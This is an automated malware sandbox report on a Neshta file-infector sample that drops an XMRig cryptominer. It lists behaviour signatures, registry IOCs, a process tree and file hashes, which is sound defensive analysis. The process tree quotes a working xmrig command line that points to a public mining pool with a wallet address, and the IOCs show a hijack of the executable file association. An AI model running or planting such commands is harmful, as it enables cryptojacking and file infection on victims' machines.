aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44

General
Target

aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe

Filesize

6MB

Completed

31-12-2021 09:39

Score
10/10
MD5

120e6c560c8582338b97bc1112703588

SHA1

4017ad3a595577f006273315a927764d6bf53941

SHA256

aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44

Malware Config
Signatures 16

Collection
Credential Access
Defense Evasion
Discovery
Persistence
  • Detect Neshta Payload

  • Modifies system executable filetype association
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe

    TTPs

    Modify Registry
    Change Default File Association

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
  • Neshta

    Description

    Malware from the Neshta family is designed to infect other files in order to spread itself and cause damage.

  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detected Stratum cryptominer command

    Description

    Appears to be attempting to contact a Stratum mining pool.

  • XMRig Miner Payload

  • Executes dropped EXE
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe, svchost.com, svchost.com, start.exe, xmrig.exe, xmrig.exe

    Reported IOCs

    pid | process
    3036 | aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    3424 | svchost.com
    3172 | svchost.com
    1376 | start.exe
    3292 | xmrig.exe
    3500 | xmrig.exe
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local System
    Credentials in Files
  • Drops file in Program Files directory
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe, svchost.com

  • Drops file in Windows directory
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe, svchost.com, svchost.com

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\svchost.com | aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modification | C:\Windows\directx.sys | svchost.com
    File opened for modification | C:\Windows\directx.sys | svchost.com
    File opened for modification | C:\Windows\svchost.com | svchost.com
    File opened for modification | C:\Windows\svchost.com | svchost.com
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies registry class
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe, aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe, OpenWith.exe, OpenWith.exe

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings | aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings | OpenWith.exe
    Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings | OpenWith.exe
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pid | process
    616
  • Suspicious use of AdjustPrivilegeToken
    xmrig.exe, xmrig.exe

    Reported IOCs

    description | pid | process
    Token: SeLockMemoryPrivilege | 3292 | xmrig.exe
    Token: SeLockMemoryPrivilege | 3500 | xmrig.exe
    Token: SeLockMemoryPrivilege | 3500 | xmrig.exe
    Token: SeLockMemoryPrivilege | 3292 | xmrig.exe
  • Suspicious use of SetWindowsHookEx
    OpenWith.exe, OpenWith.exe

    Reported IOCs

    pid | process
    1200 | OpenWith.exe
    4000 | OpenWith.exe
  • Suspicious use of WriteProcessMemory
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe, aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe, svchost.com, start.exe, svchost.com, cmd.exe

    Reported IOCs

    description | pid | process | target process
    PID 2416 wrote to memory of 3036 | 2416 | aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe | aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    PID 3036 wrote to memory of 3424 | 3036 | aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe | svchost.com
    PID 3036 wrote to memory of 3172 | 3036 | aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe | svchost.com
    PID 3172 wrote to memory of 1376 | 3172 | svchost.com | start.exe
    PID 1376 wrote to memory of 1916 | 1376 | start.exe | cmd.exe
    PID 3424 wrote to memory of 3292 | 3424 | svchost.com | xmrig.exe
    PID 1916 wrote to memory of 3500 | 1916 | cmd.exe | xmrig.exe
Processes 10
  • C:\Users\Admin\AppData\Local\Temp\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    "C:\Users\Admin\AppData\Local\Temp\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe"
    Modifies system executable filetype association
    Drops file in Program Files directory
    Drops file in Windows directory
    Modifies registry class
    Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Users\Admin\AppData\Local\Temp\3582-490\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe"
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Windows\svchost.com
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\xmrig.exe"
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        PID:3424
        • C:\Users\Admin\AppData\Local\Temp\xmrig.exe
          C:\Users\Admin\AppData\Local\Temp\xmrig.exe
          Executes dropped EXE
          Suspicious use of AdjustPrivilegeToken
          PID:3292
      • C:\Windows\svchost.com
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\start.exe"
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        PID:3172
        • C:\Users\Admin\AppData\Local\Temp\start.exe
          C:\Users\Admin\AppData\Local\Temp\start.exe
          Executes dropped EXE
          Suspicious use of WriteProcessMemory
          PID:1376
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\start.cmd" "
            Suspicious use of WriteProcessMemory
            PID:1916
            • C:\Users\Admin\AppData\Local\Temp\xmrig.exe
              xmrig.exe -o stratum+tcp://pool.supportxmr.com:5555 -u 49XvnNUfaH7Mr4rjpNrvLXJS8deqg1rBzPGnvuWrPnDmPRJ2w9HjvaN3sJyTYGKXzR9GYYMLZaaLhBzGEA7kKGtAFBkMYCK.rig1 -p x --donate-level 1
              Executes dropped EXE
              Suspicious use of AdjustPrivilegeToken
              PID:3500
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    Modifies registry class
    Suspicious use of SetWindowsHookEx
    PID:1200
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    Modifies registry class
    Suspicious use of SetWindowsHookEx
    PID:4000
Network
MITRE ATT&CK Matrix
    Command and Control
    Credential Access
    Defense Evasion
    Execution
    Exfiltration
    Impact
    Initial Access
    Lateral Movement
    Privilege Escalation
Downloads
                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

                  MD5

                  3b73078a714bf61d1c19ebc3afc0e454

                  SHA1

                  9abeabd74613a2f533e2244c9ee6f967188e4e7e

                  SHA256

                  ded54d1fcca07b6bff2bc3b9a1131eac29ff1f836e5d7a7c5c325ec5abe96e29

                  SHA512

                  75959d4e8a7649c3268b551a2a378e6d27c0bfb03d2422ebeeb67b0a3f78c079473214057518930f2d72773ce79b106fd2d78405e8e3d8883459dcbb49c163c4

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE

                  MD5

                  09acdc5bbec5a47e8ae47f4a348541e2

                  SHA1

                  658f64967b2a9372c1c0bdd59c6fb2a18301d891

                  SHA256

                  1b5c715d71384f043843ea1785a6873a9f39d2daae112ccdeffcd88b10a3a403

                  SHA512

                  3867bf98e1a0e253114a98b78b047b0d8282b5abf4aaf836f31cc0e26224e2a1b802c65df9d90dc7696a6dbcb9a8e4b900f1d1299e1b11e36f095ebaf8a2e5b8

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe

                  MD5

                  576410de51e63c3b5442540c8fdacbee

                  SHA1

                  8de673b679e0fee6e460cbf4f21ab728e41e0973

                  SHA256

                  3f00404dd591c2856e6f71bd78423ed47199902e0b85f228e6c4de72c59ddffe

                  SHA512

                  f7761f3878775b30cc3d756fa122e74548dfc0a27e38fa4109e34a59a009df333d074bf14a227549ae347605f271be47984c55148685faac479aeb481f7191db

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe

                  MD5

                  322302633e36360a24252f6291cdfc91

                  SHA1

                  238ed62353776c646957efefc0174c545c2afa3d

                  SHA256

                  31da9632f5d25806b77b617d48da52a14afc574bbe1653120f97705284ea566c

                  SHA512

                  5a1f7c44ce7f5036bffc18ebac39e2bf70e6f35fa252617d665b26448f4c4473adfa115467b7e2d9b7068823e448f74410cdcdfef1ac1c09021e051921787373

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe

                  MD5

                  8ffc3bdf4a1903d9e28b99d1643fc9c7

                  SHA1

                  919ba8594db0ae245a8abd80f9f3698826fc6fe5

                  SHA256

                  8268d3fefe8ca96a25a73690d14bacf644170ab5e9e70d2f8eeb350a4c83f9f6

                  SHA512

                  0b94ead97374d74eaee87e7614ddd3911d2cf66d4c49abbfd06b02c03e5dd56fd00993b4947e8a4bcd9d891fa39cab18cc6b61efc7d0812e91eb3aea9cd1a427

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE

                  MD5

                  9dfcdd1ab508b26917bb2461488d8605

                  SHA1

                  4ba6342bcf4942ade05fb12db83da89dc8c56a21

                  SHA256

                  ecd5e94da88c653e4c34b6ab325e0aca8824247b290336f75c410caa16381bc5

                  SHA512

                  1afc1b95f160333f1ff2fa14b3f22a28ae33850699c6b5498915a8b6bec1cfc40f33cb69583240aa9206bc2ea7ab14e05e071275b836502a92aa8c529fc1b137

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe

                  MD5

                  5791075058b526842f4601c46abd59f5

                  SHA1

                  b2748f7542e2eebcd0353c3720d92bbffad8678f

                  SHA256

                  5c3ef3ec7594c040146e908014791dd15201ba58b4d70032770bb661b6a0e394

                  SHA512

                  83e303971ed64019fde9e4ba6f6e889f8fb105088490dfa7dcf579a12baff20ef491f563d132d60c7b24a4fd3cac29bd9dc974571cd162000fae8fba4e0e54fb

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE

                  MD5

                  4ddc609ae13a777493f3eeda70a81d40

                  SHA1

                  8957c390f9b2c136d37190e32bccae3ae671c80a

                  SHA256

                  16d65f2463658a72dba205dcaa18bc3d0bab4453e726233d68bc176e69db0950

                  SHA512

                  9d7f90d1529cab20078c2690bf7bffab5a451a41d8993781effe807e619da0e7292f991da2f0c5c131b111d028b3e6084e5648c90816e74dfb664e7f78181bc5

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE

                  MD5

                  8c753d6448183dea5269445738486e01

                  SHA1

                  ebbbdc0022ca7487cd6294714cd3fbcb70923af9

                  SHA256

                  473eb551101caeaf2d18f811342e21de323c8dd19ed21011997716871defe997

                  SHA512

                  4f6fddefc42455540448eac0b693a4847e21b68467486376a4186776bfe137337733d3075b7b87ed7dac532478dc9afc63883607ec8205df3f155fee64c7a9be

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE

                  MD5

                  176436d406fd1aabebae353963b3ebcf

                  SHA1

                  9ffdfdb8cc832a0c6501c4c0e85b23a0f7eff57a

                  SHA256

                  2f947e3ca624ce7373080b4a3934e21644fb070a53feeaae442b15b849c2954f

                  SHA512

                  a2d1a714e0c1e5463260c64048ba8fd5064cfa06d4a43d02fc04a30748102ff5ba86d20a08e611e200dc778e2b7b3ae808da48132a05a61aa09ac424a182a06a

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe

                  MD5

                  cce8964848413b49f18a44da9cb0a79b

                  SHA1

                  0b7452100d400acebb1c1887542f322a92cbd7ae

                  SHA256

                  fe44ca8d5050932851aa54c23133277e66db939501af58e5aeb7b67ec1dde7b5

                  SHA512

                  bf8fc270229d46a083ced30da6637f3ca510b0ce44624a9b21ec6aacac81666dffd41855053a936aa9e8ea6e745a09b820b506ec7bf1173b6f1837828a35103d

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE

                  MD5

                  12c29dd57aa69f45ddd2e47620e0a8d9

                  SHA1

                  ba297aa3fe237ca916257bc46370b360a2db2223

                  SHA256

                  22a585c183e27b3c732028ff193733c2f9d03700a0e95e65c556b0592c43d880

                  SHA512

                  255176cd1a88dfa2af3838769cc20dc7ad9d969344801f07b9ebb372c12cee3f47f2dba3559f391deab10650875cad245d9724acfa23a42b336bfa96559a5488

                • C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE

                  MD5

                  bcd0f32f28d3c2ba8f53d1052d05252d

                  SHA1

                  c29b4591df930dabc1a4bd0fa2c0ad91500eafb2

                  SHA256

                  bb07d817b8b1b6b4c25e62b6120e51dec10118557d7b6b696ad084a5ba5bfdeb

                  SHA512

                  79f407735853f82f46870c52058ceee4d91857a89db14868ee1169abd5c0fd2e3fa1ed230ab90b5f479a9581b88998643d69b0df498defea29e73b0d487f3b10

                • C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\armsvc.exe

                  MD5

                  8db8df5afb216d89fcb0bdf24662c9b5

                  SHA1

                  f0819d096526f02b0f7c50b56cebd7c521600897

                  SHA256

                  bc9c19ede72076a2c8cc18a4b2305cabc999244fb92d471c87036bb796d3f89f

                  SHA512

                  dc63a71b6b04e89ecf744bf890c74caa11cb3525aeccaede6dafa72fa3eebd40b8d352651d0bc8b1deb0768a38e5c2660200cac84eec48ddab01beaa8c9c0bea

                • C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe

                  MD5

                  d90510a290c2987a2613df8eba3264cf

                  SHA1

                  226b619ccd33c2a186aef6cbb759b2d4cf16fff5

                  SHA256

                  49577d0c54d9f941d25346dd964f309da452b62bfb09282cabc2fbcb169fdf5d

                  SHA512

                  e0554a501009dd67bd1dbd586ad66a90ad2d75aa67782fc5fbb783aeaed7ef8e525e70bd96a6eb8a1f9008f541e2f281061d30b7886aae771f226c5b882d8247

                • C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe

                  MD5

                  2d3cc5612a414f556f925a3c1cb6a1d6

                  SHA1

                  0fee45317280ed326e941cc2d0df848c4e74e894

                  SHA256

                  fe46de1265b6fe2e316aca33d7f7f45c6ffdf7c49a044b464fd9dc88ec92091b

                  SHA512

                  cc49b200adf92a915da6f9b73417543d4dcc77414e0c4bd2ce3bfdfc5d151e0b28249f8d64f6b7087cf8c3bab6aeeab5b152ac6199cb7cc63e64a66b4f03a9f5

                • C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe

                  MD5

                  6e84b6096aaa18cabc30f1122d5af449

                  SHA1

                  e6729edd11b52055b5e34d39e5f3b8f071bbac4f

                  SHA256

                  c6b7f9119cf867951f007c5468f75eb4dca59c7eedeb0afdd8ad9d5b9606e759

                  SHA512

                  af5b33e7e190587bb152adf65fbcd4c1cd521f638863a6d1c7de29599cce6439b6c7b653180661cb0382007aefa0ae5a1b1b841eaaa116ce715f3a5ba0725a42

                • C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE

                  MD5

                  f2056a3543ba9b6b6dde4346614b7f82

                  SHA1

                  139129616c3a9025a5cb16f9ad69018246bd9e2d

                  SHA256

                  2bab7d64d5327ca21ffd13df88b30431d0b8c0dd6cad8f4bb4db33eeb2b37d1e

                  SHA512

                  e11d1c65e046a0a6817cec4d17df1b7f5849fdb5b95527fdef78f0c433294fd2186037116a581ec3a66b07f1ab75cd8e60e408005cd64bc5eacc61a582da0942

                • C:\PROGRA~2\MOZILL~1\UNINST~1.EXE

                  MD5

                  e7d2d4bedb99f13e7be8338171e56dbf

                  SHA1

                  8dafd75ae2c13d99e5ef8c0e9362a445536c31b5

                  SHA256

                  c8ef54853df3a3b64aa4b1ecfb91615d616c7ff998589e5a3434118611ad2a24

                  SHA512

                  2017dea799cc03b02a17e3616fb6fbe8c86ab2450b1aaf147fce1e67cc472ded12befd686d395386ffdaa992145996eb421d61d3a922cea45e94ac40eef76adc

                • C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe

                  MD5

                  05bdfd8a3128ab14d96818f43ebe9c0e

                  SHA1

                  495cbbd020391e05d11c52aa23bdae7b89532eb7

                  SHA256

                  7b945c7e6b8bfbb489f003ecd1d0dcd4803042003de4646d4206114361a0fbbb

                  SHA512

                  8d9b9fc407986bd53fe3b56c96b7371cc782b4bac705253bfb0a2b0b1e6883fdb022f1ac87b8bfd7005291991b6a3dfbaceab54f5d494e0af70f0435a0b8b0da

                • C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE

                  MD5

                  63dc05e27a0b43bf25f151751b481b8c

                  SHA1

                  b20321483dac62bce0aa0cef1d193d247747e189

                  SHA256

                  7d607fb69c69a72a5bf4305599279f46318312ce1082b6a34ac9100b8c7762ce

                  SHA512

                  374d705704d456cc5f9f79b7f465f6ec7c775dc43001c840e9d6efbbdef20926ed1fa97f8a9b1e73161e17f72520b96c05fa58ac86b3945208b405f9166e7ba3

                • C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE

                  MD5

                  0d9146d70ac6a41ead1ea2d50d729508

                  SHA1

                  b9e6ff83a26aaf105640f5d5cdab213c989dc370

                  SHA256

                  0b876ddeefd88d5e98de7e409c5b6546ba8ffa195c168f9a4b6ba33b44d437ab

                  SHA512

                  c9394decfd469bfedd883095d604e11208aa290334ff5c0dce852f2ca74fba27c37ba2984dab8b27430e573681e22c9f903e53b01510a4b77d337cbd92c56cb3

                • C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE

                  MD5

                  07e194ce831b1846111eb6c8b176c86e

                  SHA1

                  b9c83ec3b0949cb661878fb1a8b43a073e15baf1

                  SHA256

                  d882f673ddf40a7ea6d89ce25e4ee55d94a5ef0b5403aa8d86656fd960d0e4ac

                  SHA512

                  55f9b6d3199aa60d836b6792ae55731236fb2a99c79ce8522e07e579c64eabb88fa413c02632deb87a361dd8490361aa1424beed2e01ba28be220f8c676a1bb5

                • C:\PROGRA~3\PACKAG~1\{F4220~1\VC_RED~1.EXE

                  MD5

                  fa982a173f9d3628c2b3ff62bd8a2f87

                  SHA1

                  2cfb18d542ae6b6cf5a1223f1a77defd9b91fa56

                  SHA256

                  bc5d80d05a1bd474cb5160782765bf973ba34ea25dedf7e96dfaf932b9935032

                  SHA512

                  95ca9066a2e5272494b8e234220b6028c14892679023ca70801475c38d341032363589375ec6ffc4cde3416dd88d0e3082d315f7beddccdf014122ddd0a90644

                • C:\Users\ALLUSE~1\PACKAG~1\{CA675~1\VCREDI~1.EXE

                  MD5

                  0d9146d70ac6a41ead1ea2d50d729508

                  SHA1

                  b9e6ff83a26aaf105640f5d5cdab213c989dc370

                  SHA256

                  0b876ddeefd88d5e98de7e409c5b6546ba8ffa195c168f9a4b6ba33b44d437ab

                  SHA512

                  c9394decfd469bfedd883095d604e11208aa290334ff5c0dce852f2ca74fba27c37ba2984dab8b27430e573681e22c9f903e53b01510a4b77d337cbd92c56cb3

                • C:\Users\Admin\AppData\Local\MICROS~1\OneDrive\181510~1.001\FILECO~1.EXE

                  MD5

                  346d2ff654d6257364a7c32b1ec53c09

                  SHA1

                  224301c0f56a870f20383c45801ec16d01dc48d1

                  SHA256

                  a811042693bc2b31be7e3f454b12312f67bc97f2b15335a97e8d8f2ba0a6b255

                  SHA512

                  223545e3fc9f3cd66c5cbcb50dd7103743788f03a9db398da6dd2744ccaeee291f385ce4f2758d4504fc0f6b968fabbfe16ba03b5f546b743c51dacad7a049c3

                • C:\Users\Admin\AppData\Local\Temp\3582-490\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe

                • C:\Users\Admin\AppData\Local\Temp\config.json

                • C:\Users\Admin\AppData\Local\Temp\start.cmd

                • C:\Users\Admin\AppData\Local\Temp\start.exe

                • C:\Users\Admin\AppData\Local\Temp\tmp5023.tmp

                • C:\Users\Admin\AppData\Local\Temp\xmrig.exe

                • C:\Windows\directx.sys

                • C:\Windows\svchost.com

                • C:\odt\OFFICE~1.EXE
